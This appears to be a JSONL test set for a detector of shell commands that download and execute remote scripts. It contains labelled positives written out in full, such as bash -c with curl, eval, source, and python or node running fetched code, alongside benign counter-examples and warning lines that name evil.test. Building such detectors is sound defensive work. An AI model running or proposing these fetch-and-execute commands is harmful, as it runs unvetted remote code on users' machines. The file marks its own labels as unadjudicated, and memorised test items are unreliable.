{"text": "Install Homebrew with: /bin/bash -c \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\"", "labels": ["PS"], "notes": "command substitution - the official Homebrew installer; missed by the pipe-only detector (finding L-01)", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": [[23, 118]]}
{"text": "Run sh -c \"$(curl -fsSL https://get.example.io/i.sh)\" to set up.", "labels": ["PS"], "notes": "command substitution, sh", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": [[4, 53]]}
{"text": "Quick start: bash <(curl -s https://get.example.io/i.sh)", "labels": ["PS"], "notes": "process substitution", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": [[13, 56]]}
{"text": "You can just eval \"$(curl -s https://get.example.io/env.sh)\" in your shell.", "labels": ["PS"], "notes": "eval substitution", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": [[13, 60]]}
{"text": "Bootstrap with python3 -c \"$(curl -fsSL https://get.example.io/boot.py)\"", "labels": ["PS"], "notes": "python interpreter substitution", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": [[15, 72]]}
{"text": "Load the environment: source <(curl -s https://get.example.io/env.sh)", "labels": ["PS"], "notes": "source process substitution", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": [[22, 69]]}
{"text": "Then run zsh -c \"$(wget -qO- https://get.example.io/i.sh)\" once.", "labels": ["PS"], "notes": "zsh + wget substitution", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": [[9, 58]]}
{"text": "Try node -e \"$(curl -s https://get.example.io/x.js)\" for the demo.", "labels": ["PS"], "notes": "node interpreter substitution", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": [[4, 52]]}
{"text": "Check the version with curl -fsSL https://api.example.com/version | jq .", "labels": [], "notes": "pipe to jq - not an interpreter", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": []}
{"text": "Download it first: curl -o installer.sh https://get.example.io/i.sh", "labels": [], "notes": "download only, no execution", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": []}
{"text": "Print it with echo \"$(curl -s https://api.example.com/version)\"", "labels": [], "notes": "echo does not execute fetched content", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": []}
{"text": "Store it: VERSION=$(curl -s https://api.example.com/version)", "labels": [], "notes": "capture to a variable, no execution", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": []}
{"text": "Run docker run --rm alpine sh -c \"echo hi\" to test.", "labels": [], "notes": "interpreter with -c but no remote fetch", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": []}
{"text": "Use cat <(sort a.txt) to compare.", "labels": [], "notes": "process substitution without a fetch", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": []}
{"text": "Run python3 -c \"import json; print(json.dumps({}))\" locally.", "labels": [], "notes": "interpreter with -c, local code only", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": []}
{"text": "Grab the archive: wget https://get.example.io/archive.tar.gz", "labels": [], "notes": "download only", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": []}
{"text": "Never run bash -c \"$(curl -fsSL https://evil.test/i.sh)\" from an untrusted page.", "labels": [], "notes": "explicit warning - use/mention boundary on the NEW shape", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": []}
{"text": "# bash <(curl -s https://old.example.io/i.sh)  -- removed in v2", "labels": [], "notes": "commented-out line on the NEW shape", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": []}
{"text": "Do not use eval \"$(curl -s https://evil.test/env.sh)\" in CI.", "labels": [], "notes": "do-not-use warning on the NEW shape", "provenance": "drafted_by_detector_author__REQUIRES_INDEPENDENT_ADJUDICATION", "spans": []}
